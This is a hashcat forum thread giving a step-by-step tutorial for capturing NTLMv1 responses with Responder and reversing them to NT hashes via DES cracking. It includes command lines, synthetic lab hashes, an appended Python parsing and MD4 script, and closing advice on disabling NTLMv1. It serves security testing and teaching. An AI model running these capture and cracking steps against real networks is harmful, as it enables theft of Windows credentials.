NTLMv1 to NTLM Reversing - Printable Version

+- hashcat Forum (https://hashcat.net/forum)
+-- Forum: Misc (https://hashcat.net/forum/forum-15.html)
+--- Forum: User Contributions (https://hashcat.net/forum/forum-25.html)
+--- Thread: NTLMv1 to NTLM Reversing (/thread-9009.html)
NTLMv1 to NTLM Reversing - evilmog - 03-03-2020

So I made life easy for the mode 14000 reversing NTLMv1 to NTLM, both with and without SSP. I am adding this writeup on hashcat to save people time while searching for it. The original credit goes to atom for developing mode 14000 and his original writeups.

** All hashes in this writeup are synthetic and exist only in a lab machine; they are used for illustration purposes, and in no way should you ever post hashes on the hashcat forums. I warrant that these did not come from a live production system or one where any kind of client or customer data ever existed.

First of all, the link to the tool: https://github.com/evilmog/ntlmv1-multi

Step 1, obtain a hash:

Without SSP, if LM is enabled:
Code:
responder -I eth0 --lm -wrfFP

Code:
[SMB] NTLMv1 Client : 184.64.60.62

The hash portion looks like this:
Code:
hashcat::DUSTIN-5AA37877:76365E2D142B5612980C67D057EB9EFEEE5EF6EB6FF6E04D:727B4E35F947129EA52B9CDEDAE86934BB23EF89F50FC595:1122334455667788

Now if LM is disabled but NTLMv1 is still enabled, as per https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/network-security-lan-manager-authentication-level at a level of 2, then we have to contend with SSP:
Code:
responder -I eth0 -wrfFP

The output looks like this:
Code:
[SMB] NTLMv1-SSP Client : 184.64.60.62

The SSP hash will look like this:
Code:
hashcat::DUSTIN-5AA37877:85D5BC2CE95161CD00000000000000000000000000000000:892F905962F76D323837F613F88DE27C2BBD6C9ABCD021D0:1122334455667788

The important thing to notice is all the 0000000's in the LM portion of the hash.
NTLMv1 looks like this: username:blank:realmname/domainname:lm:nt:challenge

The important part about SSP, due to a lack of LM, is that the client challenge gets changed to an SRV challenge. The python code for the srvchallenge looks like this:
Code:
if lmresp[20:48] == "0000000000000000000000000000":

Step 2) we take our hash and we feed it to the NTLMv1 multi tool:
Code:
python ntlmv1.py --ntlmv1 "hashcat::DUSTIN-5AA37877:85D5BC2CE95161CD00000000000000000000000000000000:892F905962F76D323837F613F88DE27C2BBD6C9ABCD021D0:1122334455667788"

Step 3) we create 14000.hash; thankfully the tool outputs the command to do this:
Code:
echo "892F905962F76D32:b36d2b9a8607ea77">>14000.hash

Step 4) crack with hashcat. That being said, I already know the output; this will take about 3 days on 32 GTX 1080's, ish or so, so in order to verify I have nothing up my sleeve there is a tool in the repo that converts NTLM keys to DES keys:
Code:
python ntlm-to-des.py --ntlm 8846f7eaee8fb117ad06bdd830b7586c

We now run the echo commands it spat out, as well as the commands for the 14000.hash creation, and actually crack with hashcat:
Code:
evilmogs-MacBook-Pro-2:ntlmv1-multi evilmog$ echo '$HEX[8923bdfdaf753f63]'>>des.cand

Step 5) convert the DES keys to NTLM:
Code:
evilmogs-MacBook-Pro-2:ntlmv1-multi evilmog$ ~/git/hashcat-utils/src/deskey_to_ntlm.pl 8923bdfdaf753f63

Step 6) calculate ct3:
Code:
~/git/hashcat-utils/src/./ct3_to_ntlm.bin 2BBD6C9ABCD021D0 1122334455667788 85D5BC2CE95161CD00000000000000000000000000000000

Alternatively, you can swap out 1122334455667788 for the newly calculated SRV challenge:
Code:
~/git/hashcat-utils/src/./ct3_to_ntlm.bin 2BBD6C9ABCD021D0 b36d2b9a8607ea77

Step 7) stitch them together: 8846f7eaee8fb1 17ad06bdd830b7 586c

Step 8) verification to prove this all works:
Code:
echo -n password | iconv -f utf8 -t utf16le | openssl dgst -md4

Step 9) be lazy and use the crack.sh tokens provided and pay $ to crack, or use the 1122334455667788 challenge if you can get a solid LM.

RE: NTLMv1 to NTLM Reversing - hasherdasher - 03-03-2020

You are my hero.. Thank you for this..

RE: NTLMv1 to NTLM Reversing - evilmog - 03-04-2020

Btw, I realized there was an error in my DES KEY generation part of the post; the corrected execution is here:
Code:
evilmogs-MacBook-Pro-2:ntlmv1-multi evilmog$ python ntlm-to-des.py --ntlm 8846f7eaee8fb117ad06bdd830b7586c

RE: NTLMv1 to NTLM Reversing - DanielG - 03-04-2020

Also check out https://crack.sh/netntlm/, they crack NTLMv1 to NTLM for free fast if you set responder to the static challenge of 1122334455667788.

RE: NTLMv1 to NTLM Reversing - evilmog - 03-13-2020

(03-04-2020, 10:10 AM)DanielG Wrote: Also check out https://crack.sh/netntlm/, they crack NTLMv1 to NTLM for free fast if you set responder to the static challenge of 1122334455667788

Yep, and they reference my multi tool as listed in this post: https://crack.sh/cracking-ntlmv1-w-ess-ssp/
Also, my tool outputs crack.sh tokens.

RE: NTLMv1 to NTLM Reversing - m1ck3yb33 - 05-30-2024

What happens if responder gives me a hash like this?

What the examples show:
username::hostname:response:response:challenge

What my hash looks like:
username::hostname:challenge:response:response
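Added example for the writeup above and for the field-order question in the last reply; this is editor's code, not evilmog's ntlmv1-multi or atom's hashcat-utils, and every function and constant name in it is my own. It does the bookkeeping the writeup walks through by hand: it parses a responder line in the user::domain:lm:nt:challenge layout (rejecting a line whose fields have the wrong lengths, which is what a challenge:response:response ordering would trip), applies the same lmresp[20:48] zero-padding test the post quotes to detect SSP/ESS, derives the SRV challenge as MD5(server challenge || 8-byte client nonce)[:8], emits the first 14000.hash line, and checks step 8 by computing MD4 over the UTF-16LE password and splitting the NT hash into the 7/7/2-byte DES key inputs that step 7 stitches back together. MD4 is implemented in pure Python because hashlib's md4 is absent on many OpenSSL 3 builds. The ct3 step (the 2-byte third key) is left to ct3_to_ntlm.bin since DES is not in the standard library.

```python
import hashlib
import struct
from dataclasses import dataclass

# Added example; not code from ntlmv1-multi or hashcat-utils. All names are my own.
MASK = 0xFFFFFFFF
HEX = set("0123456789abcdefABCDEF")

def _rotl(x, n):
    return ((x << n) | (x >> (32 - n))) & MASK

def md4(data: bytes) -> bytes:
    # Pure-Python MD4 (RFC 1320): hashlib.new("md4") is missing on many OpenSSL 3 builds.
    F = lambda x, y, z: (x & y) | (~x & z)
    G = lambda x, y, z: (x & y) | (x & z) | (y & z)
    H = lambda x, y, z: x ^ y ^ z
    rounds = (
        (F, 0x00000000, (3, 7, 11, 19), tuple(range(16))),
        (G, 0x5A827999, (3, 5, 9, 13), (0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15)),
        (H, 0x6ED9EBA1, (3, 9, 11, 15), (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)),
    )
    msg = data + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64) + struct.pack("<Q", len(data) * 8)
    a, b, c, d = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    for off in range(0, len(msg), 64):
        X = struct.unpack("<16I", msg[off:off + 64])
        aa, bb, cc, dd = a, b, c, d
        for fn, add, shifts, order in rounds:
            for i, k in enumerate(order):
                a = _rotl((a + fn(b, c, d) + X[k] + add) & MASK, shifts[i % 4])
                a, b, c, d = d, a, b, c  # rotate registers: the next step updates the old d
        a, b, c, d = (a + aa) & MASK, (b + bb) & MASK, (c + cc) & MASK, (d + dd) & MASK
    return struct.pack("<4I", a, b, c, d)

def nt_hash(password: str) -> str:
    # NT hash = MD4(UTF-16LE(password)); the same thing step 8's iconv | openssl dgst -md4 does.
    return md4(password.encode("utf-16-le")).hex()

def nt_to_des_parts(nt_hex: str):
    # NTLMv1 keys its three DES operations with 7 + 7 + 2 bytes of the NT hash
    # (the last key is padded with five zero bytes): step 7's "stitch" order, reversed.
    if len(nt_hex) != 32 or not set(nt_hex) <= HEX:
        raise ValueError("NT hash must be 32 hex characters")
    nt_hex = nt_hex.lower()
    return nt_hex[0:14], nt_hex[14:28], nt_hex[28:32]

@dataclass
class NtlmV1:
    user: str
    domain: str
    lmresp: str
    ntresp: str
    challenge: str

    @property
    def is_ess(self) -> bool:
        # Same test the writeup quotes: with SSP/ESS the LM field is an 8-byte
        # client nonce followed by zero padding.
        return self.lmresp[20:48] == "0" * 28

    def effective_challenge(self) -> str:
        # Plaintext the DES blocks were computed over. Without ESS it is the server
        # challenge as captured; with ESS it is MD5(server_challenge || client_nonce)[:8],
        # the "SRV challenge" the post refers to.
        if not self.is_ess:
            return self.challenge.lower()
        nonce = bytes.fromhex(self.lmresp[:16])
        return hashlib.md5(bytes.fromhex(self.challenge) + nonce).digest()[:8].hex()

    def mode_14000_line(self) -> str:
        # First DES block of the NT response with its plaintext: what step 3 echoes into 14000.hash.
        return f"{self.ntresp[:16]}:{self.effective_challenge()}"

def parse_ntlmv1(line: str) -> NtlmV1:
    # Expected layout: user::domain:lmresp:ntresp:challenge. Lengths are checked so a line
    # with its fields in another order is rejected rather than silently miscomputed.
    parts = line.strip().split(":")
    if len(parts) != 6 or parts[1] != "":
        raise ValueError(f"expected user::domain:lm:nt:challenge, got {len(parts)} fields")
    user, _, domain, lmresp, ntresp, challenge = parts
    for name, val, n in (("lmresp", lmresp, 48), ("ntresp", ntresp, 48), ("challenge", challenge, 16)):
        if len(val) != n or not set(val) <= HEX:
            raise ValueError(f"{name} must be {n} hex chars, got {len(val)}: {val!r}")
    return NtlmV1(user, domain, lmresp, ntresp, challenge)

# Constructed input: the two synthetic hashes from the writeup.
PLAIN_LINE = "hashcat::DUSTIN-5AA37877:76365E2D142B5612980C67D057EB9EFEEE5EF6EB6FF6E04D:727B4E35F947129EA52B9CDEDAE86934BB23EF89F50FC595:1122334455667788"
ESS_LINE = "hashcat::DUSTIN-5AA37877:85D5BC2CE95161CD00000000000000000000000000000000:892F905962F76D323837F613F88DE27C2BBD6C9ABCD021D0:1122334455667788"

if __name__ == "__main__":
    for line in (PLAIN_LINE, ESS_LINE):
        h = parse_ntlmv1(line)
        print(f"{h.user}@{h.domain} ess={h.is_ess} 14000.hash line: {h.mode_14000_line()}")
    print("NT(password) =", nt_hash("password"), "DES parts:", nt_to_des_parts(nt_hash("password")))
```

The point the script makes explicit is why SSP/ESS changes nothing for the defender: the "SRV challenge" is derived entirely from values both sides send in the clear, so the DES blocks are still keyed only by the NT hash, and the NTLMv1 padding trick is just extra bookkeeping. The effective control is the LAN Manager authentication level policy linked in the first post, set high enough that NTLMv1 responses are never sent at all.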